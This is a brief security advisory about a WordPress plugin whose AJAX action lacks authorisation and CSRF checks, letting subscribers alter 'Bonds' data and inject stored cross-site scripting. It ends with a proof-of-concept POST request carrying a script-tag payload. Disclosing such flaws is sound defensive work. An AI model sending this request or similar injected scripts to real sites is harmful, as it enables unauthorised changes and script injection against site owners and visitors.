The plugin does not have any authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting (XSS) issues.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
option=SBF_DB_code_manage_action&B_COMMAND=ADD&B_PARAM=10&B_PARAM2=<script>alert(/XSS/)</script>&B_PARAM3=1&submit=submit